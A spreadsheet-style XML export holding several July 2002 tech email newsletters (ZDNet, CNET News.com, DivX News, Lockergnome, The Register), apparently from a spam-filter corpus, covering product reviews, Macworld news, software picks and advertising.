an hour?Your customers can view quotes you have created for them, search 
the product database, build their own quotes based on the pricing 
you've predetermined for them, and place orders with you online, 24/7.Sign up now to give your customers a whole new level of service.Tell me more about ChannelOnline.Elsewhere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
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.org
UnsubscribeÂ |
Â Change e-mail formatÂ |
Â Change e-mail addressÂ |
Â FAQÂ |
Â AdvertiseHome |eBusiness | Security | Networking | Applications | Platforms | Hardware | Careers
        Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a registered service mark of CNET Networks, Inc.          
</t>
  </si>
  <si>
    <t xml:space="preserve">Tech Update TodayVITAL SIGNS FOR JULY 19, 2002
David BerlindHey, thief! This laptop is lockedTry stealing my notebook and Caveo Anti-Theft will yell at you louder and louder -- before resorting to an unstoppable, ear-piercing screech. It's motion detection on a PC Card.
And it's virtually foolproofAlso: Start-up has locks for Secure Notebook
Latest from ZDNet News
Earnings: Breaking the bottom line
Feds set to enforce PC security
Movement grows to boost Wi-Fi hot spots
States may be blocking e-commerce
Microsoft's chief lawyer calls it quits
Will Mac users pay for 'Mac experience'?
HP in top PC slot--for nowMore Enterprise NewsFarber's PicksDanFarberActive Directory unbundled
Microsoft will begin selling its directory technology as a standalone product separate from Windows. The move could be seen as Microsoft's attempt to satisfy those that have accused the software giant of monopolistic practices for integrating a multitude of software into its operating system. Sun and Novell already offer so-called lightweight directory software, so Microsoft is joining an already thriving marketplace for products that store and manage information about users, computer systems and networking devices.Read the full story
How much do you build on Linux?
A question for IT managers is whether Linux is ready to move beyond file and Web servers to application and Web services servers. If IBM, Oracle, BEA, Sun, HP and other vendors have a say, the answer is yes.Find out whyCRM's dirty little secretThe goal of CRM is to reduce costs, increase revenues, and boost customer loyalty. But what if your data is dirty? Tech Update's Adrian Mello has tips on how companies can cut down on inaccurate and potentially damaging customer data.Clean up your act
Get your IT budgets approvedAn experienced IT manager offers eight tips for getting budgets approved--plus a sample budget that shows his recommendations in action.  Does your company have a five-year plan for its IT budget?Read the full story
How a CTO faced his worst nightmare
After Sept. 11, investors worried whether the stock market would quickly get back to business. NYSE technology chief Roger Burkhardt was on the job faster than a trader can say "buy." But now Burkhardt and his technology team face a new era of instability marked by fears of terrorist attacks, corporate accounting scandals, and a stock market meltdown. CNET News.com recently spoke with Burkhardt about the technology challenges the NYSE regularly faces because of the whipsaw movements of the stock market.Read the full interview
In what business do we trust?In response to my recent column, "Desperately seeking chief ethics officer," David Boulton writes: "We are missing the point when we focus on the executives of corporations and miss the underlying ethic of business in general." Boulton asks how we can possibly trust institutions that reduce human beings "to assets whose behaviors are fair game to manipulate?"Read his call for a new ethic
Back to topAlso on Tech Update Today
FEATUREÂ New connections reshape the PCBig changes are coming in PC design. Meta Group thinks enterprises should begin to plan how these changes will affect existing projects and purchasing plans. COMMENTARYÂ The road to the real tech recovery
Have falling stock prices and the tech meltdown got you down? Eric Knorr argues that the road to the real tech recovery is paved with back-to-basics innovation. 
PREVIOUSLY ON TECH UPDATE TODAYÂ Gaga for Google? When results don't count
When Dan Farber's Web search on a leading IT exec came up almost empty, he was forced to rethink his use of search engines.Crucial Clicks--products worth looking at
MONITORSA Porsche you can afford
Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.Read reviewMost Popular ProductsMonitors
1. Samsung SyncMaster 151S
2. NEC MultiSync 1550V
3. Envision EN-5100e
4. Samsung SyncMaster 570 V
5. Samsung SyncMaster 955 DF
More popular monitors
Elsewhere on ZDNetNeed a memory upgrade? Find out with CNET's Memory Configurator.Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!Find out the top 10 Web services security requirements at Tech Update.Builder.com shows you how to bring Java to the masses with Cold Fusion MX.Check out thousands of IT job listings in ZDNet's Career Center.Â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</si>
  <si>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 xml:space="preserve">DivX News (Number 20, 2002-07-19)
=================================
What's Hot in the World of DivX(tm) Video This Week:
Battle of the Planets in DivX, Warcraft III, and the Latest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Classic Battle of the Planets in DivX Video
  2. Warcraft III with DivX Video Sells like Hotcakes
  3. Skins, Skins and More Skins  
  Battle of the Planets in DivX Video!
  ------------------------------------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sci-fi animation, the series is the
  subject of a number of fan sites and discussion groups throughout
  the Internet. You can now re-live the adventures of the Battle of
  the Planets crew in high-quality DivX video. The classic episode
  "Mammoth Shark Menace" is currently featured on the DivX Showcase,
  and stay tuned for more news about future Battle of the Planets
  episodes to come.* Watch "Battle of the Planets 55: Mammoth Shark Menace" in the
  DivX Showcase:
  Warcraft III Sets Sales Records
  -------------------------------  A while ago, we told you that the highly anticipated game
  "Warcraft III: Reign of Chaos" from Blizzard Entertainment would
  feature DivX Video for cinematic cut scenes. In early July,
  Blizzard released "Warcraft III: Reign of Chaos" with
  record-setting results, shipping over 4.5 million copies to
  retailers. Coincidence? You be the judge. You can look forward to
  more announcements about DivX technology in some of your favorite
  games in the near future....* Watch the "Warcraft III" Trailer in High-quality DivX Video:
  * Read more about the successful launch:
      The Latest DivX Player Skins
  ----------------------------  Let's face it--if you don't have the latest Player skins, you're
  just not cool.
* DisPlayer: A sleek, stylish full-screen skin that will give you
  the home theatre experience on your PC. Submitted by "DIVX
  Budman."
* Coldfusion: A futuristic skin design dripping in coolness.
  Submitted by "gryphix."
* DVDesque: As the title suggests, this skin has a groovy DVD-player
  design to complement the DivX experience. Submitted by "NellyNel."
    For all the new skins, check out the DivX Skins section:
  . If you'd like to make your own skin,
  read the "How to Create a Skin" page:
  .
    That's all we have for you this week. Thanks for supporting DivX
  video. Please feel free to send us any comments and suggestions
  at .
  Until next time,
  The DivX Team
  P.S. If you have friends that you think would enjoy receiving
  this newsletter, please forward this message on to them.--
Copyright(c) 2002 DivXNetworks, Inc. All rights reserved.
DivX is a trademark of DivXNetworks, Inc.
This newsletter is sent weekly to over 1,300,000 opt-in subscribers.
If you are interested in advertising in the DivX News, write us at
.This newsletter is sent from an automated account. Replies to this
message will not be read. Please follow the unsubscribe
instructions below if you do not want to receive this newsletter
in the future.If you do not wish to receive future newsletters, you can
unsubscribe by visiting 
and entering your email address. Alternately, you can send an
email message to  and be removed
from the list.---------- Your email is protected by Mailshell ---------- 
As you requested, this email was forwarded to you by Mailshell.
Mailshell will forward your replies to this email and keep your
private email address safe.To unsubscribe safely and easily using Mailshell or to stop forwarding:
http://www.mailshell.com/control.html?a=b_fa37eeq98z1xl2zjr74cp11v559ad52admzFreshAddress.com http://rd.mailshell.com/ad482
Earn up to $3 for each of your friends who signs up with Mailshell! http://rd.mailshell.com/sp5
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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20020719 Lockergnome Windows Daily
Â  07.19.2002 GnomeREPORT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I had just finished giving Ben and his sister a "behind
the scenes" look at our set, when Patrick walked in and poked me
in the left arm repeatedly with his index finger - until I hung up
the phone and gave him my full, undivided attention. "Did you know
that your GnomeTomes are being featured in the 'Barnes &amp; Noble'
eBooks section," he asked. Well, that was news to me. After
flailing over to his workstation and flipping through a few pages,
we ultimately realized that he had discovered the entry on the
main page for Amazon's
eBooks. Cool! "With a name that inspires curiosity and sparks the imagination,
Lockergnome represents one of the latest and most popular
additions to our e-documents catalog. At prices starting under $3,
these eminently useful titles from one of the most fanciful-sounding
publishers we've encountered are hard to resist." Thank
you for helping us along, gang. My ultimate goal is to kick that
Godin guy out of the top ten - if only for a day.PC World Picks
Remove Plus! 2002
Ashampoo UnInstaller
Norton Uninstall Dlx
Perfect Companion
Uninstall Manager
Remove 4Good
Eraser 2000
I must now thank both Lockergnomie Dan Reain and Nancy Workman-Luter
(both from Sonic Foundry) for donating a couple more prizes
for this year's Gnomedex
conference. Just by walking through the entrance with your
pass in hand, you'll be automatically entered to win one of the
copies of Sound Forge XP! And this software is no slouch; for home
users and professionals on a Windows OS, it's one of the best
audio editors around. If it can't do something you need to have
done, then I bet it can't be done at all. Expect a full
Lockergnome review from our Digital Media editor (Jake) at some
point in the future. Until then, feel free to
download
the demo. If I can ever decide on a digital video camera,
perhaps their Vegas Video will sit on my system, too. Melanie and
I were talking about hardware options the other day. She's leaning
towards a Canon, too. Unless I hear or see otherwise, the ZR45MC
is at the top of my list. Still and low-light images aren't the
best, but I'm not really up for spending much more than $1000.
Neither is Gretchen, oddly enough.As much as I dislike the AOL client user interface, I gotta admit:
it's pretty darn powerful underneath. For instance, you can
"unsend" an e-mail message (but only if it was sent to another
America Online member and s/he hasn't read it yet). If you travel
often, the service is a bargain. If you know someone who just
needs the Internet basics, it's perfect. One caveat: the software
puts RealPlayer on your system without asking you first. I was a
little upset when I discovered its icon sitting in my Start Menu.
Nowhere during the installation process did I see a way to opt out
of it. I'm not surprised; there are more advertisements on AOL
than there are from your average "free" Web page host. You may
have asked yourself: "What is Chris doing installing AOL in the
first place?!" I don't blame
you. No, hell did not freeze over. We've been doing tips for
their users on our show lately, and I decided to throw it on my
laptop for testing purposes. Perhaps 8.0 will be better?
See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeDOWNLOADS
SEPopular v1.02 [2.4M] W9x/2k/XP FREEhttp://www.monocle-solutions.com/sepopular/sepopular.shtml{Popularity contest} I never considered myself to be part of the popular crowd. But how do you really know if others consider you to be popular? Well, if you are talking about the popularity of your website (although the junior high kids are more concerned about the labels on your clothes), then all you have to do is download SEPopular. Search engines (such as Google) rank your site by determining how many people link to your site (the more people who link to your site, the better your ranking). With this investigative tool, you can see how many links to your website there are (from the perspective of five major search engines). You don't just have to check out your own website, though... all you have to do is enter the URL of a website, and out comes the TRUTH about its popularity. Another nice feature of this software is that you can import web addresses from a .txt file so that you don't have to enter each one individually. It's all about keeping up with thejoneses.com.
MB-Ruler v0.93 [441k] W9x/2k/XP FREEhttp://www.markus-bader.de/MB-Ruler/{Measure distance and angles} I was never very good in geometry... Pythagoras would be disappointed that I can never exactly remember his theorem. (What did a hippopotamus have to do with triangles anyway? That animal seems to be pretty round if you ask me...) Anyway, MB-Ruler is quite a useful little application, especially for anyone who has had to work with banners and graphics for the Web. You can measure angles in radians or degrees, and distances in inches, centimeters, twips, points or pixels. And if those weren't enough options, you can even set your own scale. Everything about MB-Ruler can be customized, including its size and color. Talk about an application that "measures up!"
Recommend It!
Â GnomeCLICKSÂ GnomeSYSTEM
Your Outlook Express Password Is Not Retainedhttp://support.microsoft.com/default.aspx?scid=kb;en-us;Q264672{Fixing password problems} Now where did I put that password? I thought I had Outlook Express keeping track of it for me... If you use Outlook Express (for Windows 2000 or Windows XP) to check your e-mail, then this article is for you. Occasionally your password for Outlook Express is not retained, even though you have checked the "Remember Password" checkbox. To fix this particular issue, you will need Administrator privileges in order to make some modifications to your system's registry. The article contains steps for backing up your registry and, since you can cause a lot of accidental damage while tweaking the registry... I would recommend that you follow them.
Recommend It!
Â GnomeWILDCARD
Screen Mate Builder v1.0b [927k] W9x/2k/XP US$29
    Unearthed by Duo Yihttp://www.screenmate.net/{Animated desktop pal} Bored with your PC's desktop? All it does is sit there and stare at you, never saying a word. It sounds like you need a little something to pump some life into that desktop! With Screen Mate Builder, you can make your very own animated screen mate from any animated GIF file. On top of that, you can add background music (MIDI files) and sound clips (WAV files) to your new desktop chum. Share your creation with friends and family: trust me, it's better that they know, and don't think you just have an imaginary friend. No programming experience required - just step through the wizard and out pops your very own screen mate. Can't beat those instant buddies!Submit Your Thoughts | Recommend It!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today.Â GnomeFAVORITE
Re-route E-mail Forwarding Servicehttp://www.re-route.com/Soon, it will be time for us to fill out the change of address cards as we relocate to a different area of the city. You probably knew that your snail mail could be forwarded, but what about your e-mail? Back in the days of college e-mail accounts, every time I changed ISPs I had to send a mass e-mail to my contacts and hope they saved my new address, otherwise I could miss out on getting their correspondence. The great thing about Re-Route's service is that I don't have to worry about lost e-mails after changing ISPs. Sign up for the service, and they will take any e-mail sent to your old account and forward it to your new e-mail address. After that, Re-Route e-mails the sender to notify them of your new address. If you are with AOL, MSN, or any of their featured partners, then the first month is free. If not, then Re-Route charges a very nominal fee of ten bucks for the one month and twenty-five bucks for 3 months. Have someone else handle all my changing e-mail address need!
s? Sounds like money well spent!
Recommend It!
Â GnomeTIPJust because it is summer and bright out doesn't mean that you should stop using your flash on your digital camera. Bright sunlight creates harsh shadows that may cause you to lose detail. Don't you hate those pictures where you can only see half of someone's face because the other half is black from a shadow? Well, the cure is in front of you... use your flash during the daytime to throw a little light into those shadows. Some cameras allow you to adjust how much flash is used, also known as flash exposure compensation. If you can adjust the output of your flash, then try it at the lowest setting first. Remember, you don't want to completely get rid of the shadows because they add depth to your photo. Keep increasing your flash output until you get your desired results. Also, as an extra tip, don't forget that you can conserve battery life on your digital camera by turning on the autofocus option and turning off the LCD display.
Recommend It!http://www.lockergnome.com/issues/daily/20020719.html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we see how Sprocket thinks he has a right to eat pumpkin seeds. Or, would that be "pupkin" seeds?Not for the Puppy
Â 
CLICK HERE TO ZOOMÂ Â 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.
The way to kill competition is to create something too good for competition
to imitate.
</t>
  </si>
  <si>
    <t xml:space="preserve">THE WEEK IN REVIEW: Harvest at MacworldÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftCNET | NEWS.COM WEEK IN REVIEW
The Entire Tech Week in a Single Email
Saturday, July 20, 2002Mac fans flocked to the Macworld Expo in New York to watch Apple Computer trot out new hardware, software and even a Web services plan--but it might be a challenge getting people to pay for the offerings.
Apple CEO Steve Jobs kicked off the trade show by unveiling new iPod digital-audio players and a new flat-panel iMac.The new iPod players include models built specifically for computers that use Microsoft's Windows operating system. Apple lowered the price of the existing 5GB iPod and a redesigned 10GB model, which is thinner and comes with a new case and remote control. Jobs also introduced a beefier 20GB iPod for $499. The iPod stable now includes three models for Mac users and three models for Windows users with MusicMatch software.As expected, Jobs introduced a new iMac model with a 17-inch flat-panel monitor. The model offers a widescreen display with 1,440-by-900-pixel resolution versus 1,024-by-768-pixel resolution for the 15-inch iMac.Jobs also previewed the next version of Mac OS X, version 10.2, which will be on store shelves Aug. 24 for $129. OS X 10.2 includes a new Finder with improved search features, spring-loaded folders and the ability to change the background photo as often as every 5 seconds.But fans who rushed to OS X last year learned there's no such thing as a cheap upgrade when the company announced it will not offer a discounted upgrade version of Mac OS X version 10.2, code-named Jaguar, to current users of the operating system. To get Jaguar, current OS X users will have to buy a new Macintosh or an entirely new version of the operating system for the retail price of $129.Apple's decision not to sell a less-expensive upgrade version lay in the qualitative difference between version 10.1 and 10.2. Although the versions share the same core technology, Jaguar includes several new features and services, such as search tool Sherlock 3 and Internet address finder Rendezvous, which arguably classify it as an entirely new piece of software.Apple also raised eyebrows by transitioning its iTools Web services from a free program to a paid program called .Mac. The company plans to charge about $100 per year for the program. The collection of Web services was launched about three years ago, and now includes online storage via a service called iDisk, online greeting cards through iCards and other features.Despite iTool's popularity, the company may face a tough sell with the .Mac program. The history of paid services, is not a pretty picture. Customers have bristled when companies try to slap charges on previously free services. Some have succeeded but many have struggled, especially when free alternatives lurked elsewhere. In the early 1990s, Apple's efforts to form online communities and popularize search engines failed magnificently.To its advantage, Apple has presented a fairly coherent and tangible set of services with .Mac. And although its software division is far more organized than it once was, it's unclear how overwhelming demand will be. However, an online petition protesting the new charges doesn't bode well for the program.Microsoft's moves
Not one to be caught in anyone's shadow, Microsoft plans to offer a rebate for its Office suite for Mac OS X to those who buy the software bundle when they pick up a new Mac. The promotion entails a $50 mail-in rebate for people buying a new Mac and upgrading to Office v. X, and $100 for those buying a Mac and the full version of the software.The offers come after Microsoft revealed that sales of the software have not met its expectations. The software potentate had expected to sell 750,000 copies of Office v. X by now, but instead has sold only 300,000 since the program went on sale last November.Microsoft is also putting the finishing touches on the third collection of Windows 2000 bug fixes, which is nearly ready for release after a protracted period of testing. The update, Windows 2000 Service Pack 3, contains vital security updates and hundreds of fixes to bugs plaguing the operating system that Microsoft released in February 2000. Service Pack 3 could be important for many businesses, as not all of the included security fixes are available as separate downloads.
Not everything will be available as a download, however. Weeks before Microsoft plans to reinstate Java in Windows XP, it has shut down a site that would automatically send its Java software to Windows XP users. The company closed the install-on-demand feature 30 days after it told Java inventor Sun Microsystems it would reinstate Java in Windows XP through the forthcoming Service Pack 1 but remove it altogether in 2004.Somebody's watching youYou better watch what you write in Yahoo's free e-mail service--because Yahoo is. To protect users from malicious code, Yahoo uses an automated filter to swap out a handful of words such as "mocha" and "eval" that pertain to Web code known as JavaScript.The reason is that e-mail sent in a form known as "Web enhanced" can contain JavaScript instructions able to run programs on the recipient's PC. JavaScript is a Web language that can issue commands such as telling the browser to open up other windows or to prompt a service to change a password, for example."Mocha" is one of those special commands that can be run from Web-enhanced e-mail. Typing "mocha:" into the location bar of the Netscape browser will open a screen with a display area and a text box underneath, in which commands can be entered. A malicious hacker could, for example, use the command line to run a program that changes a person's password without that person's knowledge.
On the heels of plans for new powers to patrol people's Web use, the U.S. government is again turning to technology to monitor suspicious activity in the name of fighting terrorism. The government has unveiled more details of its Terrorist Information and Prevention System (TIPS), a plan to recruit volunteers across the country who will keep tabs on dubious or suspicious behavior."The program will involve the millions of American workers who, in the daily course of their work, are in a unique position to see potentially unusual or suspicious activity in public places," according to the TIPS Web site. But the American Civil Liberties Union, one of several critics of the plan, fears the proposal will encourage racial profiling and vigilantism, possibly leading to searches of private homes without a warrant.Also of note
A handful of entrepreneurial technology companies are advancing techniques once used haphazardly by record companies and Napster-haters, in ways that may be far more destructive to the credibility of file-swapping networks than were previous efforts...Apple released the final version of its QuickTime 6 digital media software, marking a stand-down in a dispute over licensing fees...The Federal Trade Commission is planning to take a deeper look at whether some state laws illegally restrict Internet commerce...In one of the toughest sentences for online auction fraud, a Virginia man was sentenced to 12 years in prison for defrauding hundreds of shoppers on eBay and Yahoo auction sites...The House of Representatives overwhelmingly approved a bill that would allow for life prison sentences for malicious computer hackers...MPEG LA, a group of patent holders governing MPEG-4, finalized licensing terms for the media delivery standard, bowing to market pressure for manageable royalty rates...Several tech and telecommunications giants are considering a joint venture to pepper the United States with wireless "hot spots."Want more? Check out all this week's News.com headlines.
The e-mail address for your subscription isÂ qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org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</si>
  <si>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 xml:space="preserve">Today's Headlines from The Register
-----------------------------------    To unsubscribe from this daily news update, see the instructions at
    the end of this message.Software    Bill Gates spams the world on Trustworthy Computing
    Integrity? He's heard of it too...
        http://www.theregister.co.uk/content/4/26292.html    ElcomSoft rubbishes eBook security ahead of Sklyarov case
    Shot across the bows
        http://www.theregister.co.uk/content/4/26291.html    Capitalist tool Forbes tools up for Linux
    Insurgents win glossy special report accolade
        http://www.theregister.co.uk/content/4/26289.html    China to build own version of Windows 98
    Compatible with Office 2000 and Word, says here
        http://www.theregister.co.uk/content/4/26278.htmlPersonal Hardware    Dan sold - but not as going concern
    New owner buys assets
        http://www.theregister.co.uk/content/54/26287.htmlSemiconductors    Inventor of Risc chips dies
    John Cocke RIP
        http://www.theregister.co.uk/content/3/26293.htmlInternet    JPEG guardians vow to defend free images
    All your compression tech belongs to ï¿½ er,  somebody in Texas
        http://www.theregister.co.uk/content/6/26296.html    KPNQwest employees abandon posts
    Network on cruise control
        http://www.theregister.co.uk/content/6/26295.html    BT broadband barometer shows faulty readings
    Open wide
        http://www.theregister.co.uk/content/6/26286.html    Dutch judge tears up bulk mail ban
    Be a good boy and eat your spam
        http://www.theregister.co.uk/content/6/26283.html    WorldCom to face bankruptcy on Monday?
    So it seems
        http://www.theregister.co.uk/content/6/26280.html    Easynet buys ex-Energis German ops
    Subject to approvals...
        http://www.theregister.co.uk/content/6/26279.html    Time Warner takes over AOL
    Grownups back in charge
        http://www.theregister.co.uk/content/6/26276.htmlNet Security    Face recognition fails in Boston airport
    The patriotic scam goes on
        http://www.theregister.co.uk/content/55/26298.html    New thomas.greene spam circulating
    Filter me!
        http://www.theregister.co.uk/content/55/26294.html    ElcomSoft rubbishes eBook security ahead of Sklyarov case
    Shot across the bows
        http://www.theregister.co.uk/content/55/26291.html    The Devil is in the Detail
    The SCREWTAPE Letters
        http://www.theregister.co.uk/content/55/26284.htmlBusiness    Ericsson axes 5,000 jobs
    Posts worse than expected losses
        http://www.theregister.co.uk/content/7/26282.html    Sun goes back into black
    Back in the black as US sales increase 20%
        http://www.theregister.co.uk/content/7/26281.html    MS licensing deadline boosts popularity of WinXP
    Funny that...
        http://www.theregister.co.uk/content/7/26277.html    Time Warner takes over AOL
    Grownups back in charge
        http://www.theregister.co.uk/content/7/26276.htmlBroadband    Satellite broadband for cars goes live in UK
    Unfortunately, there's just the teensiest problem...
        http://www.theregister.co.uk/content/22/26288.html    BT broadband barometer shows faulty readings
    Open wide
        http://www.theregister.co.uk/content/22/26286.htmlThe Mac Channel    Apple must raise prices - Now!
    Letters Jobs, you're too cheap
        http://www.theregister.co.uk/content/39/26297.htmlChannel Flannel    Dan sold - but not as going concern
    New owner buys assets
        http://www.theregister.co.uk/content/51/26287.htmlThe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</si>
  <si>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 xml:space="preserve">&lt;!--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20020719 Sausage Sizzler - Lockergnome - Webmaster WeeklyÂ 07.19.2002 WebREPORT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This year's SIC gets the blame for the 
lateness of this issue. Lori and I spent Wednesday thru Sunday meeting 
software authors, participating in educational sessions, viewing product 
demonstrations, and most of all having fun. This was Lori's second trip 
to an SIC conference, so she got to reacquaint herself with many familiar 
faces, while I was getting to put faces with many people I've exchanged 
e-mails with over the last several years. As much as I enjoy information 
exchange via computer, the human interaction of meeting people and 
sharing ideas and stories face-to-face is priceless.One cool discovery at this year's SIC, pertaining directly to Webmasters, 
is Nick Bradbury's release of 
TopStyle 3.0. 
Nick's the guy who created HomeSite, long before it joined the Macromedia 
family of products. Version 3 represents a return to those HTML editing 
roots, with the addition of editing capabilities now functioning 
hand-in-hand with the rock solid style sheet building features that 
previously defined  TopStyle. Conversion of existing font tags to CSS is 
just one of several new additions. I should have a full review in one of 
the next two issues.Also in the coming soon category - a GnomeTome on Cold Fusion, written by 
one of Iowa's resident ColdFusion experts (who also happens to be an 
expert on an International level), Kevin Schmidt. Kevin wrote the 
Training From the Source 
book on Cold Fusion 5 and is currently writing a revision for 
ColdFusionMX. The GnomeTome means we'll have a nice pairing of tips for 
both static pages, in the form of 
Dreamweaver tips, and tips on dynamic 
site development with Kevin's tips on ColdFusion.Jake LudingtonÂ Â Â Â Â Â Â Â Â GnomeMAIL
Email 911
http://www.email911.comE-mail remains the killer app of the Internet, despite all the incredible 
artistic efforts by many Web designers. As we all know, e-mail is also a 
source of great frustration and misuse - turning otherwise likeable folks 
into enemies of your inbox defense system. Email 911 aims to educate the 
ignorant, while aiding those of us with a reasonable understanding of 
effective e-mail communication in ways to make e-mail even more useful. 
The newsletters and discussions affiliated with this site should be 
required reading for all corporate users, although home users would most 
certainly benefit as well. For an exceptional look at eliminating junk 
from your inbox, check out the e-book "What Can I Do About Spam?"Â GnomeTOOLS
ApacheConf v2.0 [1.1MB] W9X/NT/W2K/XP $19.95
http://www.zecos.com/apacheconf/index.htmlConfigure your Apache httpd.conf file in a visual environment instead 
of a text editor. This tool provides a visual representation of all 
configurable options available to Apache admins, offering great 
learning capabilities for newer webmasters, as well as saving time for 
experienced administrators who tire of scrolling through screen after 
screen of configurations. A source view makes manual editing of the 
file easier, by bolding and coloring various configuration directives, 
similar to the way HTML editors mark code. Avoid typos with built-in 
error checking, which provides warnings when invalid directives are 
used.
Â GnomeSERVER
Latest kbALertz for WebmatersQ324098 - File Download Dialog Box Appears After You Turn Off File Downloads (Q324098)
Q325216 - WebCast: Administrating Internet Explorer in Windows 2000 (Q325216)
Q265288 - FP2000: Themes Dialog Box Flashes and Then Disappears (Q265288)
Q321156 - FtpPutFile Returns Success Although the Operation Fails in Internet Explorer (Q321156)
Q264951 - FP2000: Error 2 When You Attempt to Open Registry Key in FrontPage (Q264951)
TURBO-CHARGE YOUR FTP EXPERIENCE: TurboFTP is a fully automated 
FTP client to make your Internet file transfer fast and efficient. It 
offers a straightforward dual-pane view that covers both a local folder 
and a remote directory. TurboFTP offers strong interruption and stall 
protection. It also allows you to drag and drop from Windows Explorer. 
TuroboFTP also includes firewall compatibility and comes with a handy 
Address Book for convenient organization of your FTP sites. 
Get Your FREE Trial Now!
Â GnomeUSABILITY
Making A Commercial Case for Adopting Web Standards
http://www.maccaws.com/Supporting standards and writing good code are often things that the number 
crunchers in a business don't feel are as important, when compared against 
getting the product to as many people as possible in the shortest amount of 
time possible in an effort to generate revenue. Communicating the 
importance of standards and good code can be an uphill battle; after all, 
you're just a programmer, right? MACCAWS aims to make your job easier, via 
an open discussion on the establishment of standards that will make sense 
to the folks who control the bottom line. Their mission is to educate 
business leaders by providing you the end user with tools that will help 
make a case for applying standards to your Web efforts. If you've got a 
voice you'd like to add to their cause, visit them on the Web and help 
  influence the course of Web standards development.Â GnomeBLOG
WAPBLOGGER
http://www.ubique.ch/wapblogger/Post to your blog via a WAP enabled device with the assistance of this 
interface, designed by "some Swiss guy called Niklaus. As long as your 
blogging tool supports the Blogger API (most do), you'll have no problem 
updating your online thoughts, no matter where in the world you may be. 
Use a WAP browser from your Palm, Pocket PC, or even a cell phone. The 
service is currently free, hosted by Niklaus at his personal site. The 
site FAQ offers great suggestions for adding posts while keeping 
connection charges to a minimum. http://www.lockergnome.com/issues/webmasterweekly/20020719.html
Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org] - To unsubscribe or change your delivery address, please visit the subscription management page. For further information, please refer to the GnomeCREDITS in the sidebar.
LOCKERGNOME
Â Download Our Tip FilesÂ Latest Windows Daily
Â Latest Digital Media
Â Latest Tech Specialist
Â Latest Penguin ShellÂ Latest Apple Core
Â Latest Web Weekly
Â Latest Bits &amp; Bytes
Â Latest Audio ShowÂ Low Price Search
Â $99 Tech ConferenceÂ The GnomeSTORE
Â Tell a Friend About Us!
Â Suggest a Feature
Â Advertise With Us
Â High-Tech Job Search
Â Chat With Gnomies
Â Watch The WebcamsÂ Computer Power UserÂ Read Past Issues
Â Download X-Setup
Â About Lockergnome
Â Our Privacy Policy
Â View More Options
Â Our XML / RSS Feed
Â Syndicate Our TipsÂ Link To Lockergnome
Â Get Chris's Book
Â General Feedback
Â E-mail the Editor
Â Jake's BlogÂ Our XML / RSS Feed
Â Syndicate Our Tips
Â Link To LockergnomeÂ SOUND SYSTEMS
Yamaha RX-V1200
Sony DAVC900
Harman Kardon	AVR520
Denon	AVR5803
Pioneer VSXD811S
Pioneer Elite	VSX49TX
Sony HTDDW840
Yamaha HTR5560
BOSE LS122BK
Sony DAVC450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smoother?Â 
LOOK IT UPÂ 
CREDITSÂ©2002, Sausage Software and Lockergnome LLC. All Rights Reserved. Nathan Allan, the Sausage Crew and Lockergnome Lunatics spin all the content. Please read our Terms of Service.Â Â Search Past Issues:
Â 
GETTING PAID WHAT YOU ARE WORTH? Change your career - or get a better one! Your dream job could be a mouse click away. Visit our job search page for a position with a future. Find a new career today!
</t>
  </si>
  <si>
    <t xml:space="preserve">
ZDNet AnchorDesk Daily NewsletterAcer brings P4 power to the people--read the review at ZDNet. 
Download Builder.com's 'Remedial XML' series. 
Need a memory upgrade? Find out with CNET's Memory Configurator. 
Tech Update: Put a lid on CRM costs with self-service. 
Check out thousands of IT job listings in ZDNet's Career Center. MON JUL 22, 2002Â David CourseyHow Microsoft plans to take over your living room
                MS's upcoming Windows XP Media Center Edition does more than add a personal video recorder and a new interface to the OS. It could be the opening salvo in the company's bid to control home entertainment. Let me explain.
PLUS: AnchorDesk Radio: How to fight the World Wide Wait Gates tells all... Cheap PCs from Gateway... Sony's tiny digicam 
Wanna speed up your dial-up Web surfing? Here's how 
Hey thief! You just TRY stealing this notebook
What's new in reviews: The latest eMac--and more  Crucial Clicks: More from ZDnet           Networking    An all-purpose WiFi router       Need a router for your wireless network? ZDNet reviewers say the AirPlus DI-614+ offers good speed performance, ease of use, and exceptional security.   Read review      Most Popular Products    Networking 1. Linksys EtherFast wireless AP 2. Linksys EtherFast router 3. Siemens SpeedStream router 4. NetGear HE102 802.11a wireless AP 5. Netgear RP614 More popular networking products             Â SYLVIA CARRÂ Gates tells all... Cheap PCs from Gateway... Sony's tiny digicamBill Gates shares his views on the top tech issues in his very own e-mail newsletter. Plus: Gateway entices back-to-school buyers with cheap PCs. And is Sony's mini-digital camera a must-have fashion accessory? 
 Â DAVID MORGENSTERNÂ Wanna speed up your  Web surfing? Here's howYou dial-up Web surfers are always trying to speed up your connections--which is why you like the Propel service David Coursey recommended. But it's not the only way to fight the World Wide Wait. David sums up your suggestions. QuickPoll results: Would you pay $129 to upgrade to OS X 10.2? Â DAVID BERLINDÂ 
Hey thief! You just TRY stealing this notebook
                Lay a hand on David's notebook, and it emits an unstoppable, ear-piercing screech. Sound like a good way to prevent notebook theft? David thinks so, too. That's why he's been using the Caveo Anti-Theft security system.
Â JOHN MORRIS AND JOSH TAYLORÂ 
What's new in reviews: The eMac--and more
                After two long years, John is taking leave from Hits and Hype. But never fear, the column lives on with Josh. In their final effort together, the duo runs down the most notable products--such as the new eMac--on ZDNet this week.
Â PRESTON GRALLAÂ 
Lights, camera...My favorite movie screensavers!
                Love the movies? Wish you could be watching one instead of sitting at your PC? Preston's got a way to bring Hollywood to your desktop (well, almost): movie screensavers. Here are three of his top picks.
AnchorDesk Home | Previous IssueSign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@zzzason.orgUnsubscribeÂ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</si>
